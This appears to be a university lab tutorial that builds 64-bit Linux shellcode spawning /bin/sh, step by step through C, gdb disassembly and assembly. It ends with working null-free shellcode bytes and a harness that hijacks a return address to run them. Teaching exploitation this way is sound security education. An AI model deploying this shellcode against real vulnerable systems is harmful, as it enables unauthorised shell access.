Shellcode

Introduction

Shellcode is used in buffer overflow attacks. It is simply binary machine instructions in string format. In general, shellcode is difficult to create, but extremely easy to find. This tutorial explains how to create shellcode.

The ideas from this tutorial are taken from Aleph1's Smashing the stack for fun and profit. It has been rewritten to expand explanations and so that it works on modern systems (specifically 64-bit linux kernels).

While this kind of attack is not usually possible anymore on modern computers, it is still often possible on embedded systems and IoT devices.

Executing a shell

The first task is to build a C program that will execute a shell. It should be as simple as possible. Here is a very simple C program that does just that:

// shellcode.c
#include <unistd.h>
int main() { 
   char *array[2];
   array[0] = "/bin/sh";
   array[1] = NULL;
   execve(array[0], array, NULL);
   return 0;
}

Compile it and make sure that it works correctly. Note that it's compiled statically (-static). This is important for some of the next steps. gcc -static -oshellcode shellcode.c

It works just as expected. Now the program needs to be disassembled. In order to disassemble the execve function, it needed to be compiled into the program. That is why the -static flag was necessary previously. gdb is used to disassemble the important functions.

root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000401b8d <+0>:     push   %rbp
0x0000000000401b8e <+1>:     mov    %rsp,%rbp
0x0000000000401b91 <+4>:     sub    $0x10,%rsp
0x0000000000401b95 <+8>:     lea    0x7b468(%rip),%rax        # 0x47d004
0x0000000000401b9c <+15>:    mov    %rax,-0x10(%rbp)
0x0000000000401ba0 <+19>:    movq   $0x0,-0x8(%rbp)
0x0000000000401ba8 <+27>:    mov    -0x10(%rbp),%rax
0x0000000000401bac <+31>:    lea    -0x10(%rbp),%rcx
0x0000000000401bb0 <+35>:    mov    $0x0,%edx
0x0000000000401bb5 <+40>:    mov    %rcx,%rsi
0x0000000000401bb8 <+43>:    mov    %rax,%rdi
0x0000000000401bbb <+46>:    callq  0x43c700 <execve>
0x0000000000401bc0 <+51>:    mov    $0x0,%eax
0x0000000000401bc5 <+56>:    leaveq 
0x0000000000401bc6 <+57>:    retq   
End of assembler dump.
(gdb) disass execve
Dump of assembler code for function execve:
0x000000000043c700 <+0>:     mov    $0x3b,%eax
0x000000000043c705 <+5>:     syscall 
0x000000000043c707 <+7>:     cmp    $0xfffffffffffff001,%rax
0x000000000043c70d <+13>:    jae    0x43c710 <execve+16>
0x000000000043c70f <+15>:    retq   
0x000000000043c710 <+16>:    mov    $0xffffffffffffffc0,%rcx
0x000000000043c717 <+23>:    neg    %eax
0x000000000043c719 <+25>:    mov    %eax,%fs:(%rcx)
0x000000000043c71c <+28>:    or     $0xffffffffffffffff,%rax
0x000000000043c720 <+32>:    retq 
End of assembler dump.
(gdb) quit

What's actually going on here? The following table explains what different sets of instructions are doing.

https://filippo.io/linux-syscall-table/

Explanation Instructions
Set up the main function push %rbp mov %rsp,%rbp sub $0x10,%rsp
Evaluate and move the address of the string /bin/sh onto the stack lea 0x7b468(%rip),%rax mov %rax,-0x10(%rbp)
Zero the memory after the address of the string. This is required because the execve syscall needs a null-terminated array for its argv parameter. movq $0x0,-0x8(%rbp)
Move the address of the /bin/sh string into rax mov -0x10(%rbp),%rax
Store the address of the address of /bin/sh in rcx (remember that the argv parameter consumes an array of pointers, so that is what this is) lea -0x10(%rbp),%rcx
Set edx to zero, since we don't use the third parameter of execve (null will disable it) mov $0x0,%edx
Rearrange the values to observe the calling convention of x86-64 Linux mov %rcx,%rsi mov %rax,%rdi
The call to our static execve function callq 0x43c700 <execve>
Complete main and return 0 mov $0x0,%eax leaveq retq

With the knowledge of what is happening in main, it's possible to figure out what's within the execve function.

Explanation Instructions
Set the syscall id for execve mov $0x3b,%eax
The arguments for the syscall were satisfied by the calling convention from main to execve being almost the same as for the syscall itself. Therefore, we can simply perform the sycall now. syscall
This part is irrelevant, because the above syscall never returns (execution of /bin/sh begins instead) cmp $0xfffffffffffff001,%rax jae 0x43c710 <execve+16> retq mov $0xffffffffffffffc0,%rcx neg %eax mov %eax,%fs:(%rcx) or $0xffffffffffffffff,%rax retq

There are a lot of instructions here. Needless to say, not all of them are needed. The shorter the shellcode is, the more robust it is.

First, the following things must exist in memory:

Then all that needs to be done is:

If the execve call fails, though, the program should exit cleanly. To do this, a call to exit can be added to the end of the shellcode. It's not too much extra trouble.

Exiting a program is actually very simple. Simply pass an exit code using the calling convention and use syscall 0x3c. On Linux (and many other systems), an exit code of 0 indicates that a program completed without an error.

Compiling the assembly instructions

Now that the basics of what needs to be done have been figured out, it's time to put it all together. With /bin/sh in memory, here's what needs to be done:

  1. Put the address of /bin/sh in rdi
  2. Ensure /bin/sh is null terminated with a '\0'
  3. Put the address of /bin/sh in array[0]
  4. Put an eight-byte NULL in array[1]
  5. Put the address of the array into rsi
  6. Put a NULL into rdx
  7. Put 0x3b in rax
  8. Call syscall
  9. Store 0x0 in rdi
  10. Store 0x3c in rax
  11. Call syscall

This roughly translates to:

???? %rdi                        # get string into rdi
movb $0x0, string-end(%rdi)      # null terminate string
movq %rdi, array-0-offset(%rdi)  # store address of string
movq $0x0, array-1-offset(%rdi)  # null terminate array
movq $0x0, %rdx                  # put a null in rdx
leaq array-0-offset(%rdi), %rsi  # put array address in rsi
movq $0x3b, %rax                 # set syscall number for execve
syscall                          # do the syscall execve
movq $0x0, %rdi                  # set exit status of 0
movq $0x3c, %rax                 # set syscall number for exit
syscall                          # do the syscall exit
.string "/bin/sh"

This is all well and good, but the address of the /bin/sh string isn't known. It could end up anywhere in the program, and there's no way of knowing. On x86-32, it was possible to leak addresses by using the call instruction to push the address of the next instruction to the stack. This is not possible on x86-64. Fortunately, the 64 bit instruction set allows for a new, more direct way of obtaining addresses. You may be familiar with the instruction pointer, rip, which indicates the address of the next instruction to be executed. While this is normally restricted register, we are actually allowed to use it as a base address in the lea instruction.

lea  (%rip), %rdi                # (7) get the address of rip
addq inst-offset, %rdi           # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, string-len(%rdi)      # (4) null terminate string
movq %rdi, array-0-offset(%rdi)  # (4) store address of string
movq $0x0, array-1-offset(%rdi)  # (8) null terminate array
movq $0x0, %rdx                  # (7) put a null in rdx
leaq array-0-offset(%rdi), %rsi  # (4) put array in rsi
movq $0x3b, %rax                 # (7) set syscall number for execve
syscall                          # (2) do the syscall execve
movq $0x0, %rdi                  # (7) set exit status of 0
movq $0x3c, %rax                 # (7) set syscall number for exit
syscall                          # (2) do the syscall exit
.string "/bin/sh"

The number of bytes for each instruction has been included in the above instructions.

This is pretty much the final assembly code, but the offsets need to be determined. To know what the offsets are, a memory location for the array has to be determined. Since the program won't be executing any other instructions, any memory location within the program's address space will work. A good place for it is just after the /bin/sh string.

Indicating the 8 byte address of /bin/sh with addr and the 8 byte address of a NULL with null, the goal is to lay out the memory like this:

/bin/sh\0[addr][null]

For clarity, the (approximate) C equivalent of what's happening is this:

char string[16] = "/bin/sh";

char *null_terminator = string + STRING_LEN;
long *string_addr = string + ARRAY_0_OFFSET;
long *null_addr = string + ARRAY_1_OFFSET;

*null_terminator = '\0';
*string_addr = (long)string;
*null_addr = 0;

To resolve the instruction offset, count the number of bytes from the end of the lea instruction until the beginning of /bin/sh. It's 56, so the instruction becomes addq $56, %rdi. We also add some things so that the program can assemble correctly. You may wonder why we have the instruction offset at all. In fact, it is only here to benefit the clarity of the example and make the code easier for us to modify by hand. You could add the instruction offset to the other constants, or you can add it to the lea instruction (however, this would break later) and the shellcode would still work. However, we will leave it in this example.

main:
lea  (%rip), %rdi                # (7) get the address of rip
addq $56, %rdi                   # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, 0x7(%rdi)             # (4) null terminate string
movq %rdi, 0x8(%rdi)             # (4) store address of string
movq $0x0, 0x10(%rdi)            # (8) null terminate array
movq $0x0, %rdx                  # (7) put a null in rdx
leaq 0x8(%rdi), %rsi             # (4) put array in rsi
movq $0x3b, %rax                 # (7) set syscall number for execve
syscall                          # (2) do the syscall execve
movq $0x0, %rdi                  # (7) set exit status of 0
movq $0x3c, %rax                 # (7) set syscall number for exit
syscall                          # (2) do the syscall exit
.string "/bin/sh"
.globl main

This is pretty easy to compile with gdb. Just put it in a file with a .s extension, and gdb knows that it's assembly instructions. The added symbols above define a main function so the program compiles properly.

root:~# gcc -g -o shellcode shellcode.s

Disassembling the program in gdb will ensure gcc didn't change anything.

root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000001125 <+0>:     lea    0x0(%rip),%rdi        # 0x112c <main+7>
0x000000000000112c <+7>:     add    $0x38,%rdi
0x0000000000001130 <+11>:    movb   $0x0,0x7(%rdi)
0x0000000000001134 <+15>:    mov    %rdi,0x8(%rdi)
0x0000000000001138 <+19>:    movq   $0x0,0x10(%rdi)
0x0000000000001140 <+27>:    mov    $0x0,%rdx
0x0000000000001147 <+34>:    lea    0x8(%rdi),%rsi
0x000000000000114b <+38>:    mov    $0x3b,%rax
0x0000000000001152 <+45>:    syscall 
0x0000000000001154 <+47>:    mov    $0x0,%rdi
0x000000000000115b <+54>:    mov    $0x3c,%rax
0x0000000000001162 <+61>:    syscall 
0x0000000000001164 <+63>:    (bad)  
0x0000000000001165 <+64>:    (bad)  
0x0000000000001166 <+65>:    imul   $0xf006873,0x2f(%rsi),%ebp
0x000000000000116d <+72>:    (bad)  
0x000000000000116e <+73>:    add    %al,0x57(%rcx)

It looks fine, but if you try to run this program, it will segfault. The reason is because the program modifies itself. When compiled this way, the instructions (as well as the string) are in the text/code section of the program. Modern kernels mark this section as read-only. When the program tries to write null byte at the end of /bin/sh, it crashes.

That's okay because when used, this will be executing in the stack. To quickly prepare this for the stack, objdump will output the binary for the instructions.

root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125:       48 8d 3d 00 00 00 00    lea    0x0(%rip),%rdi        # 112c <main+0x7>
112c:       48 83 c7 38             add    $0x38,%rdi
1130:       c6 47 07 00             movb   $0x0,0x7(%rdi)
1134:       48 89 7f 08             mov    %rdi,0x8(%rdi)
1138:       48 c7 47 10 00 00 00    movq   $0x0,0x10(%rdi)
113f:       00 
1140:       48 c7 c2 00 00 00 00    mov    $0x0,%rdx
1147:       48 8d 77 08             lea    0x8(%rdi),%rsi
114b:       48 c7 c0 3b 00 00 00    mov    $0x3b,%rax
1152:       0f 05                   syscall 
1154:       48 c7 c7 00 00 00 00    mov    $0x0,%rdi
115b:       48 c7 c0 3c 00 00 00    mov    $0x3c,%rax
1162:       0f 05                   syscall 
1164:       2f                      (bad)  
1165:       62                      (bad)  
1166:       69 6e 2f 73 68 00 0f    imul   $0xf006873,0x2f(%rsi),%ebp
116d:       1f                      (bad)  
116e:       40                      rex

Everything up through the final syscall instruction are normal instructions. The information after it is the string /bin/sh, which can be replaced with the actual string /bin/sh. The shellcode can be tested in a simple program.

char shellcode[] =
  "\x48\x8d\x3d\x00\x00\x00\x00\x48\x83\xc7\x38\xc6\x47\x07\x00\x48\x89\x7f\x08\x48\xc7\x47\x10\x00\x00\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x48\x8d\x77\x08\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\xc7\xc7\x00\x00\x00\x00\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05/bin/sh";

void shell() {
  long* ret; 
  ret = (long*)&ret + 2;
  (*ret) = (long)shellcode;
}

int main() { 
   shell();
   return 0;
}

Now just compile (allowing the stack to be executable) and run:

root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
# exit
root:~#

It works properly. You should run this executable in gdb and step through each line of assembly to confirm your understanding of what is happening.

Removing null characters

Many buffer overflows exploits rely on functions that read strings until reaching a null character. If there are any null characters in shellcode, then the function will stop reading at the first one, and all of the shellcode will not make its way into the program. It's actually pretty simple to replace instructions that contain null characters. The following table includes instructions that cause problems and their replacements.

Problem Replacement
leaq 0x0(%rip),%rdi leaq -0x1(%rip),%rdi Add one to the instruction offset counter to compensate for this
movb $0x0, 0x7(%rdi) movq $0x0, 0x10(%rdi) movq $0x0, %rdx xorq %rax, %rax movb %al, 0x7(%rdi) movq %rax, 0x10(%rdi) movq %rax, %rdx
movq $0x3b, %rax movq $0x3c, %rax xorq %rax, %rax addb 0x3b, %al (or 0x3c)
movq $0x0, %rdi xorq %rdi, %rdi

The assembly instructions now become:

main:
leaq    -0x1(%rip), %rdi
addq    $0x28, %rdi
xorq    %rax, %rax
movb    %al, 0x7(%rdi)
movq    %rdi, 0x8(%rdi)
movq    %rax, 0x10(%rdi)
movq    %rax, %rdx
leaq    0x8(%rdi), %rsi
addb    $0x3b, %al
syscall 
xorq    %rdi, %rdi
xorq    %rax, %rax
addb    $0x3c, %al
syscall 
.string "/bin/sh"
.globl main

Note that the jump offset has changed since instructions were modified. Assembling this, and using objdump results in the following:

root:~# gcc -g -o shellcode shellcode.s
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125:       48 8d 3d ff ff ff ff    lea    -0x1(%rip),%rdi        # 112b <main+0x6>
112c:       48 83 c7 28             add    $0x28,%rdi
1130:       48 31 c0                xor    %rax,%rax
1133:       88 47 07                mov    %al,0x7(%rdi)
1136:       48 89 7f 08             mov    %rdi,0x8(%rdi)
113a:       48 89 47 10             mov    %rax,0x10(%rdi)
113e:       48 89 c2                mov    %rax,%rdx
1141:       48 8d 77 08             lea    0x8(%rdi),%rsi
1145:       04 3b                   add    $0x3b,%al
1147:       0f 05                   syscall 
1149:       48 31 ff                xor    %rdi,%rdi
114c:       48 31 c0                xor    %rax,%rax
114f:       04 3c                   add    $0x3c,%al
1151:       0f 05                   syscall 
1153:       2f                      (bad)  
1154:       62                      (bad)  
1155:       69 6e 2f 73 68 00 0f    imul   $0xf006873,0x2f(%rsi),%ebp

As expected, all of the nulls have been removed (except for the garbage after our string), so we can update our shellcode:

char shellcode[] = 
  "\x48\x8d\x3d\xff\xff\xff\xff\x48\x83\xc7\x28\x48\x31\xc0\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x89\xc2\x48\x8d\x77\x08\x04\x3b\x0f\x05\x48\x31\xff\x48\x31\xc0\x04\x3c\x0f\x05/bin/sh";

Compiling it and running it in the previous shellcode.c program shows that the shellcode works, and now it has no null characters.

root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
$ exit
root:~#

Using the shellcode

Shellcode is used in buffer overflow attacks. To learn more about how to use the shellcode, read about buffer overflows.

Classwork

For submission, run some commands after you get the shell from executing the program and take a screenshot.

NOTE: You may find that this lab is very easy to complete by copying the steps shown above. While that is sufficient to get credit right now, you will find that you won't have learned the skills required to do subsequent assignments effectively. Unless you have an unusual schedule, it is better for you to spend the time required to understand this concept now rather than later.

As a challenge to test your understanding, try modifying this shellcode to work without null terminating the string dynamically, and instead use the null terminator implicitly provided by C (optional).